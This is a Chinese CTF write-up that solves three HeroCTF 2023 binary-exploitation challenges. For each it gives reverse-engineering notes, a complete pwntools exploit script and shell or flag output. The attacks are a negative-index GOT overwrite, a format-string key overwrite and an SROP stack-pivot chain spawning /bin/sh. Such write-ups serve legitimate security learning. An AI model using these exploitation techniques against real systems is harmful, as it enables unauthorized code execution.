散文網 » 生活 »日常 » CTF 2023 三道pwn題

CTF 2023 三道pwn題

2023-05-25 10:34 作者:rkvir逆向工程學院 0人讀過 | 我要投稿

作者丨selph

appointment_book

程序信息

程序保護信息：

? HeroCTF checksec appointment_book
[*]?'/home/selph/ctf/HeroCTF/appointment_book'
??? Arch:???? amd64-64-little
??? RELRO:??? No RELRO
??? Stack:??? Canary found
??? NX:?????? NX enabled
??? PIE:????? No PIE (0x400000)

這里其實已經給出提示了，沒有Relocation Read-Only，沒有PIE，說明可以去修改got表項，當時咋就沒想到呢hhhh

程序運行信息：

*****?Select an option?*****
1) List appointments
2) Add an appointment
3) Exit

Your choice:?2
[+] Enter the index of this appointment (0-7):?0
[+] Enter a date?and?time (YYYY-MM-DD HH:MM:SS):?1111-11-11?22:22:22
[+] Converted to UNIX timestamp using local timezone:?-27080300601
[+] Enter an associated message (place, people, notes...): YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

*****?Select an option?*****
1) List appointments
2) Add an appointment
3) Exit

Your choice:?1

[+] List of appointments:
-?Appointment n°1:
????-?Date:?1111-11-11?22:22:22
????-?Message: YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

-?Appointment n°2:
??? [NO APPOINTMENT]
-?Appointment n°3:
??? [NO APPOINTMENT]
-?Appointment n°4:
??? [NO APPOINTMENT]
-?Appointment n°5:
??? [NO APPOINTMENT]
-?Appointment n°6:
??? [NO APPOINTMENT]
-?Appointment n°7:
??? [NO APPOINTMENT]
-?Appointment n°8:
??? [NO APPOINTMENT]

*****?Select an option?*****
1) List appointments
2) Add an appointment
3) Exit

逆向分析

主程序：就是提供個菜單項，主要功能在菜單函數內

int?__cdecl __noreturn main(int?argc,?const?char?**argv,?const?char?**envp)
{
??char?*v3;?// rax
??int?v4;?// [rsp+4h] [rbp-Ch]
??time_t?v5;?// [rsp+8h] [rbp-8h]

? memset(&appointments,?0,?0x80uLL);
? puts("========== Welcome to your appointment book. ==========");
? v5?=?time(0LL);
? v3?=?timestamp_to_date(v5);
? printf("\n[LOCAL TIME] %s\n",?v3);
? fflush(stdout);
??while?(?1?)
??{
??? v4?=?menu();
????if?(?v4?==?3?)
????{
????? puts("\n[+] Good bye!");
????? fflush(stdout);
????? exit(1);
????}
????if?(?v4?>?3?)
????{
LABEL_10:
????? puts("\n[-] Unknwon choice\n");
????? fflush(stdout);
????}
????else?if?(?v4?==?1?)
????{
????? list_appointments();
????}
????else
????{
??????if?(?v4?!=?2?)
????????goto?LABEL_10;
????? create_appointment();
????}
??}
}

list_appointments函數：這里只是展示結構體保存的內容，沒有什么特別的

int?list_appointments()
{
??int?result;?// eax
??char?*v1;?// rax
??int?i;?// [rsp+4h] [rbp-Ch]
??const?char?**v3;?// [rsp+8h] [rbp-8h]

? puts("\n[+] List of appointments: ");
? result?=?fflush(stdout);
??for?(?i?=?0;?i?<=?7;?++i?)
??{
??? v3?=?(const?char?**)((char?*)&appointments?+?16?*?i);
??? printf("- Appointment n°%d:\n",?(unsigned?int)(i?+?1));
????if?(?v3[1]?)
????{
????? v1?=?timestamp_to_date((time_t)*v3);
????? printf("\t- Date: %s\n",?v1);
????? printf("\t- Message: %s\n",?v3[1]);
????}
????else
????{
????? puts("\t[NO APPOINTMENT]");
????}
??? result?=?fflush(stdout);
??}
??return?result;
}

create_appointment()：這里是向結構體里填充內容，但不存在堆棧相關漏洞

這里的結構體是在IDA里手動創(chuàng)建的，打開結構體窗口，然后右鍵創(chuàng)建即可

unsigned?__int64 create_appointment()
{
? __int64 v0;?// rax
??int?i;?// [rsp+Ch] [rbp-24h] BYREF
??void?*tmp_data;?// [rsp+10h] [rbp-20h]
??char?*content;?// [rsp+18h] [rbp-18h]
? Appointment?*v5;?// [rsp+20h] [rbp-10h]
??unsigned?__int64 v6;?// [rsp+28h] [rbp-8h]

? v6?=?__readfsqword(0x28u);
? tmp_data?=?malloc(0x20uLL);
? content?=?(char?*)malloc(0x40uLL);????????????//?可以申請一堆，導致內存泄露，但沒啥用
? memset(tmp_data,?0,?0x20uLL);
? memset(content,?0,?0x40uLL);
??do
??{
??? printf("[+] Enter the index of this appointment (0-7): ");
??? fflush(stdout);
??? __isoc99_scanf("%d",?&i);
??? getchar();
??}
??while?(?i?>?7?);??????????????//?【關鍵點?。。。。　?br>? v5?=?&appointments[i];
? printf("[+] Enter a date and time (YYYY-MM-DD HH:MM:SS): ");
? fflush(stdout);
? fgets((char?*)tmp_data,?0x1E,?stdin);
? v0?=?date_to_timestamp((__int64)tmp_data);????//?接收到一個數字
? v5->time?=?v0;????????????????????????????????//?保存到v5第一個成員
? printf("[+] Converted to UNIX timestamp using local timezone: %ld\n",?v5->time);
? printf("[+] Enter an associated message (place, people, notes...): ");
? fflush(stdout);
? fgets(content,?0x3E,?stdin);??????????????????//?寫內容到chunk中
? v5->pMessage?=?(__int64)content;??????????????//?只能申請chunk，不能釋放，賦值一個指針
? free(tmp_data);
??return?v6?-?__readfsqword(0x28u);
}

這里的一個小細節(jié)，反而是這個題目的關鍵點！?。。?/p>

do
??{
??? printf("[+] Enter the index of this appointment (0-7): ");
??? fflush(stdout);
??? __isoc99_scanf("%d",?&i);
??? getchar();
??}
??while?(?i?>?7?);??????

這是中間的一段循環(huán)，意思是，如果輸入的索引超過了索引上限，則要求重新輸入，但是這里輸入可以為負數！

程序里還有個輔助函數：

.text:0000000000401336?;?Attributes:?bp-based frame
.text:0000000000401336
.text:0000000000401336?;?int?debug_remote()
.text:0000000000401336?public debug_remote
.text:0000000000401336?debug_remote proc near
.text:0000000000401336?;?__unwind?{
.text:0000000000401336?endbr64
.text:000000000040133A?push??? rbp
.text:000000000040133B?mov???? rbp,?rsp
.text:000000000040133E?lea???? rax,?command????;?"/bin/sh"
.text:0000000000401345?mov???? rdi,?rax????????;?command
.text:0000000000401348?call??? _system
.text:000000000040134D?nop
.text:000000000040134E?pop???? rbp
.text:000000000040134F?retn
.text:000000000040134F?;?}?// starts at 401336
.text:000000000040134F?debug_remote endp

當這里輸入為負數，則繞過了索引值合法性的檢查，使用負數索引，會導致索引到數組之前的地址上面，然后對其進行編輯

這里的思路就是，通過輸入一個負數索引，讓數組索引到got表項上，然后修改got表項的值為該輔助函數，最后觸發(fā)拿到shell

利用

查看該數組所在的地址：0x0000000004037A0

查看got表項地址：

.got.plt:0000000000403740?A0?38?40?00?00?00?00?00?????? off_403740 dq offset strftime???????????;?DATA XREF:?_strftime+4↑r
.got.plt:0000000000403748?A8?38?40?00?00?00?00?00?????? off_403748 dq offset __isoc99_scanf?????;?DATA XREF:?___isoc99_scanf+4↑r
.got.plt:0000000000403750?B0?38?40?00?00?00?00?00??? ???off_403750 dq offset exit???????????????;?DATA XREF:?_exit+4↑r

計算中間的距離：0x50，剛好只需要輸入為索引-5即可讓time字段覆蓋到exit函數上，只需要計算一下時間戳的轉換即可：

這里有一個點就是，不同時區(qū)計算出來的結果是不同的，要在比賽中用上，需要使用比賽所在地的時區(qū)

這里本地利用，只需要使用本地時間即可，利用腳本：

#!/bin/python3
from pwn import?*

FILE_NAME?=?"./appointment_book"
REMOTE_HOST?=?""
REMOTE_PORT?=?0

elf?=?context.binary?=?ELF(FILE_NAME)

gs?=?'''
continue
'''
def start():
????if?args.REMOTE:
????????return?remote(REMOTE_HOST,REMOTE_PORT)
????if?args.GDB:
????????return?gdb.debug(elf.path,?gdbscript=gs)
????else:
????????return?process(elf.path)

io?=?start()

# =============================================================================
# ============== exploit ===================

io.sendline(b"2")
io.sendline(b"-5")
io.sendline(b"1970-02-18 22:27:02")
io.sendline(b"junk data")
io.sendline(b"3")

# =============================================================================

io.interactive()

運行結果：

? HeroCTF python3 appointment.py
[*]?'/home/selph/ctf/HeroCTF/appointment_book'
?? ?Arch:???? amd64-64-little
??? RELRO:??? No RELRO
??? Stack:??? Canary found
??? NX:?????? NX enabled
??? PIE:????? No PIE?(0x400000)
[*]?'/usr/lib/x86_64-linux-gnu/libc.so.6'
??? Arch:???? amd64-64-little
??? RELRO:??? Partial RELRO
??? Stack:??? Canary found
??? NX:?????? NX enabled
??? PIE:????? PIE enabled
[+]?Starting local process '/home/selph/ctf/HeroCTF/appointment_book':?pid?19621
[*]?Switching to interactive mode
==========?Welcome to your appointment book.?==========

[LOCAL TIME]?2023-05-16?11:02:54

*****?Select an option?*****
1)?List appointments
2)?Add an appointment
3)?Exit

Your choice:?[+]?Enter the index of this appointment?(0-7):?[+]?Enter a date and time?(YYYY-MM-DD HH:MM:SS):?[+]?Converted to UNIX timestamp using local timezone:?4199222
[+]?Enter an associated message?(place,?people,?notes...):
*****?Select an option?*****
1)?List appointments
2)?Add an appointment
3)?Exit

Your choice:
[+]?Good bye!
$ w
?11:02:56?up??8:17,??1?user,? load average:?0.01,?0.13,?0.15
USER???? TTY????? FROM???????????? LOGIN@?? IDLE?? JCPU?? PCPU WHAT
selph??? tty2???? tty2?????????????六14????2days??0.01s??0.01s?/usr/libexec/gnome-session-binary?--session=ubuntu

impossible_v2

時間花在了，格式化字符串和AES算法上

程序信息

安全選項：無PIE，其他基本上都開了

? HeroCTF checksec impossible_v2
[*]?'/home/selph/ctf/HeroCTF/impossible_v2'
??? Arch:???? amd64-64-little
??? RELRO:??? Partial RELRO
??? Stack:??? Canary found
??? NX:?????? NX enabled
??? PIE:????? No PIE?(0x400000)

運行：

? HeroCTF?./impossible_v2
I've implemented a?1-block AES ECB?128?cipher that uses a random key.
Try to give me a message such as AES_Encrypt(message,?key)?=?0xdeadbeefdeadbeefcafebabecafebabe.
(don't try too much,?this is impossible).

Enter your message:?good
Do you want to change it???(y/n)?y
Enter your message?(last chance):?asd
So,?this is your final message:?6173640a000000000000000000000000000000000000000000000000000000000000000000000000

Well,?I guess you're not this smart?:)

提示的很明顯，這里進行了一次AES ECB模式?128位的加密，使用的是隨機的Key，要求最后加密的結果為0xdeadbeefdeadbeefcafebabecafebabe才行

逆向分析

程序流程全在main函數里，比較簡單：

int?__cdecl main(int?argc,?const?char?**argv,?const?char?**envp)
{
??char?v4;?// [rsp+3h] [rbp-3Dh]
??char?v5;?// [rsp+3h] [rbp-3Dh]
??int?i;?// [rsp+4h] [rbp-3Ch]
??FILE?*streama;?// [rsp+8h] [rbp-38h]
??FILE?*stream;?// [rsp+8h] [rbp-38h]
??char?input[40];?// [rsp+10h] [rbp-30h] BYREF
??unsigned?__int64 v10;?// [rsp+38h] [rbp-8h]

? v10?=?__readfsqword(0x28u);
? puts(
????"I've implemented a 1-block AES ECB 128 cipher that uses a random key.\n"
????"Try to give me a message such as AES_Encrypt(message, key) = 0xdeadbeefdeadbeefcafebabecafebabe.\n"
????"(don't try too much, this is impossible).\n");
? fflush(stdout);
? streama?=?fopen("/dev/urandom",?"rb");
? fread(key,?0x10uLL,?1uLL,?streama);???????????// key是隨機數
? fclose(streama);
? printf("Enter your message: ");
? fflush(stdout);
? fgets(input,?40,?stdin);
? sprintf(message,?input);??????????????????????//?格式化字符串漏洞
? printf("Do you want to change it ? (y/n) ");
? fflush(stdout);
? v4?=?getc(stdin);
? getc(stdin);
??if?(?v4?==?'y'?)
??{
??? printf("Enter your message (last chance): ");
??? fflush(stdout);
??? fgets(input,?40,?stdin);
??? sprintf(message,?input);????????????????????//?再次輸入的機會
??}
? printf("So, this is your final message: ");
??for?(?i?=?0;?i?<=?39;?++i?)
??? printf("%02x",?(unsigned?__int8)message[i]);
? puts("\n");
? fflush(stdout);
? AES_Encrypt((__int64)message,?key);???????????// AES加密
??if?(?!memcmp(message,?expected,?0x10uLL)?)????//?用戶輸入的加密結果和預置比對
??{
??? puts("WHAT ?! THIS IS IMPOSSIBLE !!!");
??? stream?=?fopen("flag.txt",?"r");
????while?(?1?)
????{
????? v5?=?getc(stream);
??????if?(?v5?==?-1?)
????????break;
????? putchar(v5);
????}
??? fflush(stdout);
??? fclose(stream);
??}
??else
??{
??? puts("Well, I guess you're not this smart :)");
??? fflush(stdout);
??}
??return?0;
}

首先是生成了一個隨機數，保存在全局變量key中，然后使用該key加密用戶輸入的信息，和預置值進行比對

這里整個流程下來，可以輸入兩次信息，這里錯誤使用sprintf的參數，導致格式化字符串漏洞

所以思路就很簡單了：

1.?通過格式化字符串漏洞，修改key的值為固定值（注意，這里的key長度為16字節(jié)）

2.?通過key和加密結果進行AES解密，拿到正確的輸入

利用

#!/bin/python3
from?pwn?import?*
from?Crypto.Cipher?import?AES

FILE_NAME?=?"impossible_v2"
REMOTE_HOST?=?"static-03.heroctf.fr"
REMOTE_PORT?=?5001

elf?=?context.binary?=?ELF(FILE_NAME)

gs?=?'''
continue
b* 0x00401369
b* 0x00401490
'''
def?start():
????if?args.REMOTE:
????????return?remote(REMOTE_HOST,REMOTE_PORT)
????if?args.GDB:
????????return?gdb.debug(elf.path, gdbscript=gs)
????else:
????????return?process(elf.path)

io?=?start()

password?=?b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
text?=?b"\xDE\xAD\xBE\xEF\xDE\xAD\xBE\xEF\xCA\xFE\xBA\xBE\xCA\xFE\xBA\xBE"
aes?=?AES.new(password,AES.MODE_ECB)
input?=?aes.decrypt(text)

# ============== exploit ===================

key?=?0x004040c0
io.sendline(b'%09$lln%10$lln..'?+?pack(key)+pack(key+8))
io.sendline(b'y')
io.sendline(input)
print(input)

# =============================================================================

io.interactive()

執(zhí)行結果：

? HeroCTF python3 impossible.py
[*]?'/home/selph/ctf/HeroCTF/impossible_v2'
??? Arch:???? amd64-64-little
??? RELRO:??? Partial RELRO
??? Stack:??? Canary found
??? NX:?????? NX enabled
??? PIE:????? No PIE (0x400000)
[+] Starting local process?'/home/selph/ctf/HeroCTF/impossible_v2': pid?21746
b'M\xaadj\xa2\xb5\xe3-\x10v\xa9\xe6\xbf\xa5\xe2\xba'
[*] Switching to interactive mode
I've implemented a 1-block AES ECB 128 cipher that uses a random key.
Try to give me a message such as AES_Encrypt(message, key) = 0xdeadbeefdeadbeefcafebabecafebabe.
(don't try too much, this is impossible).

Enter your message: Do you want to change it ? (y/n) Enter your message (last chance): So, this is your final message: 4daa646aa2b5e32d1076a9e6bfa5e2ba0a0000000000000000000000000000000000000000000000

WHAT ?! THIS IS IMPOSSIBLE !!!

?

RopeDancer

程序信息

安全選項：全都沒有，呦呵，有蹊蹺

? HeroCTF checksec ropedancer
[*]?'/home/selph/ctf/HeroCTF/ropedancer'
??? Arch:???? amd64-64-little
??? RELRO:??? No RELRO
??? Stack:??? No canary found
??? NX:?????? NX disabled
??? PIE:????? No PIE (0x400000)
??? RWX:????? Has RWX segments

運行：就只是單純的輸入一次字符串，疑似棧溢出

? HeroCTF ./ropedancer
Hello. So, you want to be a ROPedancer? no
Well, let me know?if?you change your mind.

逆向分析

IDA打開一看，只有4個函數，是不妙的感覺

_exit? .text??0000000000401085?00000009????????? .?? .?? .?? .?? .?? .?? T?? .
_start .text??0000000000401016?0000006F???00000004????? .?? .?? .?? .?? .?? .?? .?? .
check_email?? .text??0000000000401000?00000016???00000000????? R?? .?? .?? .?? .?? .?? T?? .
get_motivation_letter?? .text??000000000040108E?0000008B???00000018????? R?? .?? .?? .?? .?? B?? T?? .

首先是get_motivation_letter：

signed?__int64 get_motivation_letter()
{
??signed?__int64 v0;?// rax
??signed?__int64 v1;?// rax
??signed?__int64 result;?// rax
??char?v3[16];?// [rsp+0h] [rbp-10h] BYREF

? v0?=?sys_read(0,?v3,?0x64uLL);????????????????//?棧溢出
??if?(?(unsigned?int)check_email(v3)?)??????????//?判斷是否有@
??{
??? __asm?{?syscall;?LINUX?-?sys_write?}????????//?輸出提示信息
??? v1?=?sys_read(0,?motivation_letter,?0x1F4uLL);//?可以寫入一堆東西
????return?sys_write(1u,?"We will get back to you soon. Good bye.\n",?0x29uLL);
??}
??else
??{
??? result?=?1LL;
??? __asm?{?syscall;?LINUX?-?sys_write?}????????// write(0,string,0x31)
??}
??return?result;
}

這里是一個棧溢出，但是能溢出的字節(jié)并不多

然后經過一個判斷，就只是判斷字符串里是否包括@符號，無關緊要

通過判斷之后，通過syscall輸出提示信息，然后再次讀取輸入到全局變量里，這次讀取的范圍很大

大概流程就是這樣，其他的函數沒啥看的

利用

這個題的關鍵是rop，問題就在于幾乎沒什么跳板指令可以使用：

? HeroCTF ROPgadget?--binary ropedancer?--only?"pop|ret"
Gadgets information
============================================================
0x0000000000401117?:?pop rbp?;?ret
0x0000000000401015?:?ret

Unique gadgets found:?2
?? HeroCTF ROPgadget?--binary ropedancer?--only?"mov|ret"
Gadgets information
============================================================
0x0000000000401015?:?ret

Unique gadgets found:?1
?? HeroCTF ROPgadget?--binary ropedancer?--only?"syscall"
Gadgets information
============================================================
0x000000000040102f?:?syscall

Unique gadgets found:?1

無法控制傳參寄存器rdx rdi rsi rcx的值，無法通過rop去進行syscall執(zhí)行execve，因為棧和數據區(qū)不可執(zhí)行，也無法寫入shellcode跳轉執(zhí)行

但是這里存在syscall，且無PIE，看看能不能控制rax的值，如果能控制rax的值為0xf，就有可能可以進行srop

SROP的條件：存在棧溢出，rax的值可控，知道一個填充了/bin/sh字符串的地址

再次搜索，找到了兩個跳板指令可以修改rax的值：

0x0000000000401013?:?inc al?;?ret
0x0000000000401011?:?xor eax,?eax?;?inc al?;?ret

進行srop需要向棧里填充一堆東西，當前的溢出大小肯定是不夠的，那就需要進行一次棧遷移，把棧擴大

剛好這里提供了一個很大的全局變量可供控制，那就正好可以把棧遷移過去

棧遷移通過兩個跳板指令即可完成：

0x0000000000401114?:?mov rsp,?rbp?;?pop rbp?;?ret
0x0000000000401117?:?pop rbp?;?ret

這兩個指令，如果存在正常的函數返回，那基本上一定會存在的

解題腳本：

#!/bin/python3
from?pwn?import?*

FILE_NAME?=?"./ropedancer"
REMOTE_HOST?=?"static-03.heroctf.fr"
REMOTE_PORT?=?5002

elf?=?context.binary?=?ELF(FILE_NAME)
libc?=?elf.libc

gs?=?'''
continue
b* 0x00401118
'''
def?start():
????if?args.REMOTE:
????????return?remote(REMOTE_HOST,REMOTE_PORT)
????if?args.GDB:
????????return?gdb.debug(elf.path, gdbscript=gs)
????else:
????????return?process(elf.path)

# =======================================

io?=?start()

# =============================================================================
# ============== exploit ===================

new_stack?=?0x00000000040312C+8

# stack povit
inp?=?b"@"*0x17
rop?=?b""

mov_rsp_rbp?=?0x0000000000401114?# mov rsp, rbp ; pop rbp ; ret
pop_rbp?=?0x0000000000401117?# pop rbp ; ret
rop?+=?pack(pop_rbp)?+?pack(new_stack)
rop?+=?pack(mov_rsp_rbp)

io.sendline(b'yes\n')
io.sendline(inp+rop)

# srop

xor_eax_inc?=?0x0000000000401011?# xor eax, eax ; inc al ; ret
inc_eax?=?0x0000000000401013?# inc al ; ret
syscall?=?0x000000000040102f?# syscall
str_addr?=?new_stack-8

frame?=?SigreturnFrame()
frame.rip?=?syscall
frame.rax?=?0x3b
frame.rdi?=?str_addr
frame.rsi?=?0
frame.rdx?=?0

# set rax = 9
rop2?=?b"/bin/sh\x00"
rop2?+=?pack(new_stack?+?400)
rop2?+=?pack(xor_eax_inc)
rop2?+=?pack(inc_eax)*0xe

# trigger srop
rop2?+=?pack(syscall)
rop2?+=?bytes(frame)
io.sendline(rop2)

# =============================================================================

io.interactive()

運行：

? HeroCTF python3 ropedancer.py
[*]?'/home/selph/ctf/HeroCTF/ropedancer'
??? Arch:???? amd64-64-little
??? RELRO:??? No RELRO
??? Stack:??? No canary found
??? NX:?????? NX disabled
??? PIE:????? No PIE (0x400000)
??? RWX:????? Has RWX segments
[+] Starting local process?'/home/selph/ctf/HeroCTF/ropedancer': pid?22172
?
[*] Switching to interactive mode
Hello. So, you want to be a ROPedancer? \x00lright. Please enter an email on which we can contact you: \x00hanks. You have?400?characters to convince me to hire you: \x00e will get back to you soon. Good bye.
\x00$ w
?14:52:34?up?10:40,??1?user,? load average:?0.81,?0.54,?0.41
USER???? TTY????? FROM???????????? LOGIN@?? IDLE?? JCPU?? PCPU WHAT
selph??? tty2???? tty2???????????? Sat14????3days??0.01s??0.01s?/usr/libexec/gnome-session-binary?--session=ubuntu

標簽：